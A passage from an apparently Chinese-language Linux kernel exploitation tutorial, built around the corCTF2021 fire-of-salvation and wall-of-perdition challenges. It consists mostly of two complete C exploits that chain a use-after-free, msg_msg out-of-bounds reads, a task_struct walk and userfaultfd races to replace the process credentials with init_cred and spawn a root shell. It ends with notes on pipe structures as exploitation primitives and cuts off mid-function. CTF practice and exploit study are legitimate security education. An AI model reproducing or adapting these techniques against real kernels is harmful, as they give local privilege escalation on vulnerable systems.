if (msg.event != UFFD_EVENT_PAGEFAULT) {
puts("[-] Unexpected event on userfaultfd");
exit(EXIT_FAILURE);
}

build_msg(fake_msg, 0, 0, 1, DATALEN_MSG + 0x10, cur_task + CRED_OFFSET - 0x10, 0);
edit_rule(1, fake_msg, OUTBOUND, false);
char *page_buf = (char *) mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memset(page_buf, 0, PAGE_SIZE * 2);
*(size_t *) &page_buf[DATALEN_MSG] = init_cred;
*(size_t *) &page_buf[DATALEN_MSG + 8] = init_cred;

struct uffdio_copy uffdio_copy;
uffdio_copy.src = (size_t) page_buf;
uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
uffdio_copy.len = PAGE_SIZE * 2;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
puts("[-] Error at: ioctl-UFFDIO_COPY");
exit(-1);
}
break;
}
}

int main() {
bind_core(0);

firewall_fd = open("/dev/firewall", O_RDWR);
if (firewall_fd < 0) {
puts("[-] failed to open firewall.");
exit(-1);
}

add_rule(0, INBOUND);
dup_rule(0, INBOUND);
delete_rule(0, INBOUND);

int msqid0 = get_msg_queue();
memset(msgbuf.mtext, 'a', sizeof(msgbuf.mtext));
write_msg(msqid0, &msgbuf, sizeof(msgbuf.mtext), 1);

for (int i = 0; i < 0x500; i++) {
int shm_id = shmget(114514, 0x1000, SHM_R | SHM_W | IPC_CREAT);
if (shm_id < 0) {
puts("[-] shmget failed.");
exit(-1);
}
char *shm_addr = shmat(shm_id, NULL, 0);
if (shm_addr < 0) {
puts("[-] shmat failed.");
exit(-1);
}
}

build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, 0, 0);
edit_rule(0, fake_msg, OUTBOUND, true);

memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
printf("[*] peek_msg len: %p\n", peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("leak kernel addr from shm_file_data", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);

size_t kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
if (kernel_offset == INVALID_KERNEL_OFFSET) {
puts("[-] failed to find kernel offset.");
exit(-1);
}

init_cred += kernel_offset;
init_task += kernel_offset;
printf("[*] init_cred addr: %#lx\n", init_cred);
printf("[*] init_task addr: %#lx\n", init_task);

build_msg(fake_msg, 0, 0, 1919810, DATALEN_MSG + DATALEN_SEG, init_task + TASKS_OFFSET - 8, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
printf("[*] peek_msg len: %p\n", peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("leak root cred addr from init_task", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

uint64_t prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
uint32_t pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
printf("[*] init_task->tasks.prev: %#lx\n", prev);
printf("[*] init_task->pid: %d\n", pid);
printf("[*] current pid: %d\n", getpid());

cur_task = init_task;
while (pid != getpid()) {
build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, prev - 8, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
printf("[*] peek_msg len: %p\n", peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("find task_struct", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);
cur_task = prev - TASKS_OFFSET;
printf("[*] task_struct addr: %p\n", cur_task);
prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
printf("[*] task_struct->tasks.prev: %#lx\n", prev);
printf("[*] task_struct->pid: %d\n", pid);
}

printf("[+] find current task_struct addr: %p\n", cur_task);

add_rule(1, INBOUND);
dup_rule(1, INBOUND);
delete_rule(1, INBOUND);

char *uffd_page = (char *) mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memset(uffd_page, 0, PAGE_SIZE);
register_userfaultfd(uffd_page + PAGE_SIZE, PAGE_SIZE * 2, handler_thread);
int msqid1 = get_msg_queue();
write_msg(msqid1, uffd_page + PAGE_SIZE - 8, DATALEN_MSG + 0x10, 1);

build_msg(fake_msg, 0, 0, 123, DATALEN_MSG + DATALEN_SEG, cur_task + TASKS_OFFSET - 8, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
memset(&oob_msgbuf, 0, sizeof(oob_msgbuf));
printf("[*] peek_msg len: %p\n", peek_msg(msqid0, &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("debug current task cred", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

system("/bin/sh");

return 0;
}

例题:corCTF2021 wall-of-perdition

这道题是 corCTF2021 fire-of-salvation 的加强版,主要区别是 UAF 的 object 不在是 kmalloc-4k 而是 kmalloc-64 。因此这道题不能像上一题那样直接通过 userfaultfd + UAF 修改 next 实现任意地址写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
typedef struct
{
char iface[16];
char name[16];
uint32_t ip;
uint32_t netmask;
uint16_t proto;
uint16_t port;
uint8_t action;
uint8_t is_duplicated;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} rule_t;

不过我们可以通过堆风水使得一个 kmalloc-4kmsg_msgnext 指向另一个 kmalloc-4kmsg_msg 利用两个 userfaultfd 依次进行 next 和任意地址写。具体流程如下。
首先按下图所示构造两个 msg_queue 并添加 msg_msg

通过 UAF 修改 m_ts 越界读泄露内核基址以及 msg_msg 地址。

参照上一题的方法找到本进程 task_struct 的地址。

之后释放第二个 msg_queue 中的那个 msg_msg + msg_msgseg 结构。

由于 SLAB 类似 fast bin 的堆管理机制,再次创建 msg_msg + msg_msgseg 结构时 msg_msgmsg_msgseg 对应的两个 object 互换。也就是说之前泄露的 msg_msg 地址现在对应的是 msg_msgseg

在再次创建 msg_msg + msg_msgseg 结构时我们用 userfaultfd 将其卡住。

之后 UAF 修改 msg_msgnext 指向之前泄露的 msg_msg 也就是新添加的 msg_msgseg

释放刚才 UAF 的 msg_msg 从而将 msg_msgseg也一起释放了。

之后再次添加一个 msg_msg + msg_msgseg 结构,并同样用 userfaultfd 卡住。至此已经完成了一个 kmalloc-4kmsg_msgnext 指向另一个 kmalloc-4kmsg_msg 的结构的构造。

利用两个 userfaultfd 可以完成任意地址写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <unistd.h>


void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

bool is_kernel_text_addr(size_t addr) {
return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
// return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

#define INVALID_KERNEL_OFFSET 0x1145141919810

const size_t kernel_addr_list[] = {
0xffffffff81c41600,
0xffffffff81a159a0,
0xffffffff81802f90,
0xffffffff81802f80,
0xffffffff814c1659,
0xffffffff81b2de35,
0xffffffff81b2de2a,
0xffffffff81c4d961,
0xffffffff81b2c42d
};

size_t kernel_offset_query(size_t kernel_text_leak) {
if (!is_kernel_text_addr(kernel_text_leak)) {
return INVALID_KERNEL_OFFSET;
}
for (int i = 0; i < sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]); i++) {
if (!((kernel_text_leak ^ kernel_addr_list[i]) & 0xFFF) && (kernel_text_leak - kernel_addr_list[i]) % 0x100000 == 0) {
return kernel_text_leak - kernel_addr_list[i];
}
}
printf("[-] unknown kernel addr: %#lx\n", kernel_text_leak);
return INVALID_KERNEL_OFFSET;
}

size_t search_kernel_offset(void *buf, int len) {
size_t *search_buf = buf;
for (int i = 0; i < len / 8; i++) {
size_t kernel_offset = kernel_offset_query(search_buf[i]);
if (kernel_offset != INVALID_KERNEL_OFFSET) {
printf("[+] kernel leak addr: %#lx\n", search_buf[i]);
printf("[+] kernel offset: %#lx\n", kernel_offset);
return kernel_offset;
}
}
return INVALID_KERNEL_OFFSET;
}

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t) PAGE_SIZE - sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t) PAGE_SIZE - sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
puts("[-] Error at: userfaultfd");
exit(-1);
}
struct uffdio_api uffdio_api = {.api = UFFD_API, .features = 0};
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
puts("[-] Error at: ioctl-UFFDIO_API");
exit(-1);
}
struct uffdio_register uffdio_register;
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
puts("[-] Error at: ioctl-UFFDIO_REGISTER");
exit(-1);
}
static pthread_t monitor_thread;
if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
puts("[-] Error at: pthread_create");
exit(-1);
}
}

typedef struct {
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
} user_rule_t;


int firewall_fd;
enum {
INBOUND,
OUTBOUND
};

int add_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0x1337BABE, &(user_rule_t) {.type = type, .idx = idx, .ip = "0.0.0.0", .netmask = "0.0.0.0"});
}

int dup_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xBAAD5AAD, &(user_rule_t) {.type = type, .idx = idx});
}

int delete_rule(uint8_t idx, uint8_t type) {
return ioctl(firewall_fd, 0xDEADBABE, &(user_rule_t) {.type = type, .idx = idx});
}

void inet_ntoa(char *buf, uint32_t val) {
sprintf(buf, "%d.%d.%d.%d", val & 0x000000FF, (val & 0x0000FF00) >> 8, (val & 0x00FF0000) >> 16, (val & 0xFF000000) >> 24);
}

int edit_rule(uint8_t idx, void *buf, uint8_t type, bool invalid) {
user_rule_t rule = {.type = type, .idx = idx};
memcpy(&rule, buf, 0x20);
if (invalid) {
strcpy(rule.ip, "invalid");
strcpy(rule.netmask, "invalid");
} else {
inet_ntoa(rule.ip, *(uint32_t *) &buf[0x20]);
inet_ntoa(rule.netmask, *(uint32_t *) &buf[0x24]);
}
memcpy(&rule.proto, &buf[0x28], 2);
memcpy(&rule.port, &buf[0x2a], 2);
memcpy(&rule.action, &buf[0x2c], 2);
return ioctl(firewall_fd, 0x1337BEEF, &rule);
}

struct {
long mtype;
char mtext[0x40 - sizeof(struct msg_msg)];
} small_msgbuf;

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} large_msgbuf;

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

char fake_msg[0x2000];

size_t init_cred = 0xFFFFFFFF81C33060;
size_t init_task = 0xFFFFFFFF81C124C0;
size_t cur_task, large_msg_addr = -1;
int msq_id[4];
bool steps[3];

#define TASKS_OFFSET 0x298
#define PID_OFFSET 0x398
#define CRED_OFFSET 0x540

void *change_next_thread(void *arg) {
long uffd = (long) arg;
while (true) {
struct pollfd pollfd;
pollfd.fd = (int) uffd;
pollfd.events = POLLIN;
int nready = poll(&pollfd, 1, -1);
if (nready == -1) {
puts("[-] Error at: poll");
exit(-1);
}
static struct uffd_msg msg;
ssize_t nread = read((int) uffd, &msg, sizeof(msg));
if (nread == 0) {
puts("[-] Error at: EOF on userfaultfd!");
exit(EXIT_FAILURE);
}
if (nread == -1) {
puts("[-] Error at: read");
exit(-1);
}
if (msg.event != UFFD_EVENT_PAGEFAULT) {
puts("[-] Unexpected event on userfaultfd");
exit(EXIT_FAILURE);
}
steps[0] = true;
while (!steps[1]);
char *page_buf = (char *) mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
build_msg(page_buf + DATALEN_MSG - 8, 0, 0, 0, DATALEN_MSG + 0x10, cur_task + CRED_OFFSET - 0x10, 0);

struct uffdio_copy uffdio_copy;
uffdio_copy.src = (size_t) page_buf;
uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
uffdio_copy.len = PAGE_SIZE * 2;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
puts("[-] Error at: ioctl-UFFDIO_COPY");
exit(-1);
}
return 0;
}
}

void *change_cred_thread(void *arg) {
long uffd = (long) arg;
while (true) {
struct pollfd pollfd;
pollfd.fd = (int) uffd;
pollfd.events = POLLIN;
int nready = poll(&pollfd, 1, -1);
if (nready == -1) {
puts("[-] Error at: poll");
exit(-1);
}
static struct uffd_msg msg;
ssize_t nread = read((int) uffd, &msg, sizeof(msg));
if (nread == 0) {
puts("[-] Error at: EOF on userfaultfd!");
exit(EXIT_FAILURE);
}
if (nread == -1) {
puts("[-] Error at: read");
exit(-1);
}
if (msg.event != UFFD_EVENT_PAGEFAULT) {
puts("[-] Unexpected event on userfaultfd");
exit(EXIT_FAILURE);
}
steps[1] = true;
while (!steps[2]);

char *page_buf = (char *) mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
*(size_t *) &page_buf[DATALEN_MSG] = init_cred;
*(size_t *) &page_buf[DATALEN_MSG + 8] = init_cred;

struct uffdio_copy uffdio_copy;
uffdio_copy.src = (size_t) page_buf;
uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(0xFFF);
printf("[*] uffdio_copy.src: %p\n", uffdio_copy.src);
printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
uffdio_copy.len = PAGE_SIZE * 2;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
puts("[-] Error at: ioctl-UFFDIO_COPY");
exit(-1);
}
return 0;
}
}

void *change_next(void *arg) {
char *change_next_page = (char *) mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memset(change_next_page, 0, PAGE_SIZE);
register_userfaultfd(change_next_page + PAGE_SIZE, PAGE_SIZE * 2, change_next_thread);
msq_id[2] = get_msg_queue();
write_msg(msq_id[2], change_next_page + PAGE_SIZE - 8, DATALEN_MSG + DATALEN_MSG, 1);
steps[2] = true;
}

void *change_cred(void *arg) {
while (!steps[0]);
build_msg(fake_msg, init_task + 0x1000, init_task + 0x1000, 123, sizeof(small_msgbuf.mtext), large_msg_addr, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
read_msg(msq_id[0], &large_msgbuf, sizeof(large_msgbuf.mtext), 123);
char *change_cred_page = (char *) mmap(NULL, PAGE_SIZE * 3, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memset(change_cred_page, 0, PAGE_SIZE);
register_userfaultfd(change_cred_page + PAGE_SIZE, PAGE_SIZE * 2, change_cred_thread);
msq_id[3] = get_msg_queue();
write_msg(msq_id[3], change_cred_page + PAGE_SIZE - 8, DATALEN_MSG + 0x10, 1);
}

int main() {
bind_core(0);

firewall_fd = open("/dev/firewall", O_RDWR);
if (firewall_fd < 0) {
puts("[-] failed to open firewall.");
exit(-1);
}

add_rule(0, INBOUND);
dup_rule(0, INBOUND);
delete_rule(0, INBOUND);

msq_id[0] = get_msg_queue();
msq_id[1] = get_msg_queue();

memset(small_msgbuf.mtext, 'a', sizeof(small_msgbuf.mtext));
write_msg(msq_id[0], &small_msgbuf, sizeof(small_msgbuf.mtext), 1);
memset(small_msgbuf.mtext, 'b', sizeof(small_msgbuf.mtext));
write_msg(msq_id[1], &small_msgbuf, sizeof(small_msgbuf.mtext), 0x114514);
memset(large_msgbuf.mtext, 'c', sizeof(large_msgbuf.mtext));
write_msg(msq_id[1], &large_msgbuf, sizeof(large_msgbuf.mtext), 0x1919810);

build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG, 0, 0);
edit_rule(0, fake_msg, OUTBOUND, true);
memset(oob_msgbuf.mtext, 0, DATALEN_MSG);
printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("leak kernel addr from shm_file_data", oob_msgbuf.mtext, DATALEN_MSG);

for (int i = sizeof(small_msgbuf.mtext); i + sizeof(struct msg_msg) < DATALEN_MSG; i += 0x40) {
struct msg_msg *msg = (void *) &oob_msgbuf.mtext[i];
if (is_dir_mapping_addr((size_t) msg->m_list.next)
&& is_dir_mapping_addr((size_t) msg->m_list.prev)
&& msg->m_type == 0x114514 && msg->m_ts == sizeof(small_msgbuf.mtext)) {
large_msg_addr = (size_t) msg->m_list.next;
break;
}
}

if (large_msg_addr == -1) {
puts("[-] failed to find large msg_msg addr.");
exit(-1);
}
printf("[+] large msg addr: %p\n", large_msg_addr);

size_t kernel_offset = search_kernel_offset(oob_msgbuf.mtext, DATALEN_MSG);
if (kernel_offset == INVALID_KERNEL_OFFSET) {
puts("[-] filed to find kernel offset.");
exit(-1);
}

init_cred += kernel_offset;
init_task += kernel_offset;
printf("[*] init_cred addr: %#lx\n", init_cred);
printf("[*] init_task addr: %#lx\n", init_task);

build_msg(fake_msg, 0, 0, 1919810, DATALEN_MSG + DATALEN_SEG, init_task + TASKS_OFFSET - 8, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
memset(oob_msgbuf.mtext, 0, DATALEN_MSG + DATALEN_SEG);
printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("leak root cred addr from init_task", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);

uint64_t prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
uint32_t pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
printf("[*] init_task->tasks.prev: %#lx\n", prev);
printf("[*] init_task->pid: %d\n", pid);
printf("[*] current pid: %d\n", getpid());

cur_task = init_task;
while (pid != getpid()) {
build_msg(fake_msg, 0, 0, 114514, DATALEN_MSG + DATALEN_SEG, prev - 8, 0);
edit_rule(0, fake_msg, OUTBOUND, false);
printf("[*] peek_msg len: %p\n", peek_msg(msq_id[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0));
printf("[*] msg_msg.m_type: %ld\n", oob_msgbuf.mtype);
qword_dump("find task_struct", &oob_msgbuf.mtext[DATALEN_MSG], 0x2b0);
cur_task = prev - TASKS_OFFSET;
printf("[*] task_struct addr: %p\n", cur_task);
prev = *(uint64_t *) &oob_msgbuf.mtext[DATALEN_MSG + 8];
pid = *(uint32_t *) &oob_msgbuf.mtext[DATALEN_MSG - TASKS_OFFSET + PID_OFFSET];
printf("[*] task_struct->tasks.prev: %#lx\n", prev);
printf("[*] task_struct->pid: %d\n", pid);
}
printf("[+] find current task_struct addr: %p\n", cur_task);

read_msg(msq_id[1], &large_msgbuf, sizeof(large_msgbuf.mtext), 0x1919810);

pthread_t tid[2];
pthread_create(&tid[0], NULL, change_next, NULL);
pthread_create(&tid[1], NULL, change_cred, NULL);

pthread_join(tid[0], NULL);
pthread_join(tid[1], NULL);

system("/bin/sh");

return 0;
}

pipe 管道相关

管道同样是内核中十分重要也十分常用的一个 IPC 工具,同样地管道的结构也能够在内核利用中为我们所用,其本质上是创建了一个 virtual inode 与两个对应的文件描述符构成的。

pipe_inode_info(kmalloc-192|GFP_KERNEL_ACCOUNT):管道本体

在内核中,管道本质上是创建了一个虚拟的 inode 来表示的,对应的就是一个 pipe_inode_info 结构体(inode->i_pipe),其中包含了一个管道的所有信息,当我们创建一个管道时,内核会创建一个 VFS inode 与一个 pipe_inode_info 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

数据泄露:

  • 内核线性映射区( direct mapping area)

    pipe_inode_info->bufs 为一个动态分配的结构体数组,因此我们可以利用他来泄露出内核的“堆”上地址。

pipe_buffer(kmalloc-1k|GFP_KERNEL_ACCOUNT):管道数据

当我们创建一个管道时,在内核中会分配一个 pipe_buffer 结构体数组,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

分配:pipe 系统调用族

创建管道使用的自然是 pipe 与 pipe2 这两个系统调用,其最终都会调用到 do_pipe2() 这个函数,不同的是后者我们可以指定一个 flag,而前者默认 flag 为 0

存在如下调用链:

1
2
3
4
5
do_pipe2()
__do_pipe_flags()
create_pipe_files()
get_pipe_inode()
alloc_pipe_info()

最终调用 kcalloc() 分配一个 pipe_buffer 数组,默认数量为 PIPE_DEF_BUFFERS (16)个,因此会直接从 kmalloc-1k 中拿 object:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

//...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

释放:close 系统调用

当我们关闭一个管道的两端之后,对应的管道就会被释放掉,相应地,pipe_buffer 数组也会被释放掉

对于管道对应的文件,其 file_operations 被设为 pipefifo_fops ,其中 release 函数指针设为 pipe_release 函数,因此在关闭管道文件时有如下调用链:

1
2
pipe_release()
put_pipe_info()

put_pipe_info() 中会将管道对应的文件计数减一,管道两端都关闭之后最终会走到 free_pipe_info() 中,在该函数中释放掉管道本体与 buffer 数组。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
void free_pipe_info(struct pipe_inode_info *pipe)
{
int i;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
